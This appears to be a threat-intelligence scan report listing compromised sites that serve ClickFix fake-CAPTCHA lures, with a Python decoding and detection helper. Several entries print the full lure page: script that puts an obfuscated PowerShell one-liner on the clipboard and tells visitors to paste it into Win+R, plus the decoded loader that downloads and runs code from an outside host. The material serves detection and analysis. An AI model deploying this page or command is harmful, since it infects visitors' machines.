top:-90px;\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<div class=\"main\">\r\n <div class=\"header\"></div>\r\n <div class=\"hazard\"></div>\r\n <div class=\"content\">\r\n <div style=\"width: 50%; float: left;position: relative; top: 50px;\">Diese Domain wurde bei webgo f\u00fcr einen Kunden registriert. <br><br>Wenn Sie diese Seite sehen, ist Ihre Domain erreichbar. Im webgo Webspace Admin unter \"Paket-Verwaltung\" - \"Domainverwaltung\" sehen Sie, in welchen Ordner Ihre Domain aktuell zeigt. </div>\r\n <div style=\"width: 50%; float: left; position: relative; top: -128px;\"><center><img src=\"https://www.webgo.de/assets/images/misc/construction.png\"></center></div>\r\n </div>\r\n <div class=\"hazard2\"></div>\r\n <div class=\"footer\">Sollten Sie Inhaber dieser Domain sein, l\u00f6schen Sie diese <b>index.html</b> Datei, damit Ihre hochgeladene Seite angezeigt werden kann. <br>\r\n <span style=\"font-size: 0.7em; float: right; margin: -7px 0 0 0\"><a href=\"https://www.webgo.de/webhosting/\">Webhosting von webgo GmbH </a></span></div>\r\n </div>\r\n \r\n</body>\r\n</html>\n", "ThreatLevel": "None" }
https://lucprofessional.com.br/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
https://www.first-security-verden.de/
Total findings: 5
Indicators of Compromise
Malicious Code Sample
JSON Technical Data
https://www.laborpartyjo.com/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
https://finocci.com/
Total findings: 1
Indicators of Compromise
Type | Value |
---|---|
URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://finocci.com/", "URLs": "https://t.me/LearnUSDT_bot?start=540835569", "HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>", "ThreatLevel": "None" }
https://www.finocci.com/
Total findings: 1
Indicators of Compromise
Type | Value |
---|---|
URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://www.finocci.com/", "URLs": "https://t.me/LearnUSDT_bot?start=540835569", "HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>", "ThreatLevel": "None" }
https://www.website.mypetapp.co.za/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
https://www.lucprofessional.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
JSON Technical Data
{ "URL": "https://www.lucprofessional.grupomoltz.com.br/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
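The command this page stages on the clipboard only shows a Base64 blob piped to iex; the real stage-1 loader, and the host worth blocking, is inside that blob. What follows is an added Python triage helper written for this report (it is not ClickGrab code and not part of the captured page): it unwraps the command, decodes the argument to expose the `iex (iwr '...')` loader and its download host, and checks page HTML for the indicator combination that characterises a ClickFix lure (an unrequested clipboard write, PowerShell in page script, Base64 unwrapping, Win+R paste instructions and fake-CAPTCHA wording). The function names, the indicator list and the trimmed HTML excerpt are this example's own; the command string and URL are the ones from the entry above.

```python
import base64
import re
from urllib.parse import urlparse

# Added example for this report; decode_clickfix_command() and page_indicators()
# are names chosen here, not ClickGrab functions.

# Command string captured from the page above (the Base64 argument is verbatim).
SAMPLE_COMMAND = (
    'POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
    "'aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50'"
    ')) | iex"'
)

B64_ARG = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)


def decode_clickfix_command(command: str) -> dict:
    """Unwrap the staged one-liner: the outer command only shows a Base64 blob
    piped to iex; the decoded text is the real stage-1 loader and names the
    download host, which is the IOC worth blocking."""
    m = B64_ARG.search(command)
    if m is None:
        raise ValueError("no FromBase64String('...') argument in command")
    decoded = base64.b64decode(m.group(1)).decode("utf-8")
    urls = URL_RE.findall(decoded)
    return {
        "hidden_window": HIDDEN_WINDOW.search(command) is not None,  # -W h
        "pipes_to_iex": re.search(r"\|\s*iex\b", command, re.I) is not None,
        "decoded": decoded,
        "download_urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
    }


# Indicators that together characterise a ClickFix lure: an unrequested
# clipboard write, a PowerShell command embedded in page script, Base64
# unwrapping, Win+R paste instructions and fake-CAPTCHA wording.
PAGE_INDICATORS = {
    "clipboard_write": re.compile(
        r'execCommand\(\s*["\']copy["\']\s*\)|navigator\.clipboard\.writeText', re.I),
    "powershell_in_script": re.compile(r"powershell(?:\.exe)?\s+-\w", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "win_r_instruction": re.compile(
        r"Windows Key.{0,80}?\+\s*<b>R</b>|\bWin\s*\+\s*R\b", re.I | re.S),
    "fake_captcha_text": re.compile(r"I(?:'m| am) not a robot|reCAPTCHA Verification", re.I),
}


def page_indicators(html: str) -> list:
    """Return the names of all indicators present in a page; a lure hits all of
    them, a genuine reCAPTCHA widget hits at most the wording."""
    return [name for name, rx in PAGE_INDICATORS.items() if rx.search(html)]


# Trimmed excerpt of the captured page: the full HTML is in the JSON above, only
# the lines the indicators key on are kept here.
SAMPLE_HTML = (
    '<li>Press & hold the Windows Key <i class="fab fa-windows"></i> + <b>R</b>.</li>\n'
    '<li>In the verification window, press <b>Ctrl</b> + <b>V</b>.</li>\n'
    '<code>"I am not a robot - reCAPTCHA Verification ID: <span id="verification-id">146820</span>"</code>\n'
    "<script>\n"
    "function setClipboardCopyData(textToCopy){\n"
    '  const tempTextArea = document.createElement("textarea");\n'
    "  tempTextArea.value = textToCopy;\n"
    "  document.body.append(tempTextArea);\n"
    "  tempTextArea.select();\n"
    '  document.execCommand("copy");\n'
    "  document.body.removeChild(tempTextArea);\n"
    "}\n"
    "const commandToRun = `" + SAMPLE_COMMAND + "`;\n"
    "</script>\n"
)

if __name__ == "__main__":
    print("page indicators:", ", ".join(page_indicators(SAMPLE_HTML)))
    info = decode_clickfix_command(SAMPLE_COMMAND)
    print("decoded stage-1:", info["decoded"])
    print("hosts to block / hunt:", info["hosts"])
```

The decoded loader fetches a `.txt` with `-UseBasicParsing` and hands the body straight to `iex`, so the next stage is whatever that URL serves at the time; block the host rather than the file name, since the path is clearly random.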
https://thesignaturemag.salviatech.com/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
JSON Technical Data
{ "URL": "https://thesignaturemag.salviatech.com/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
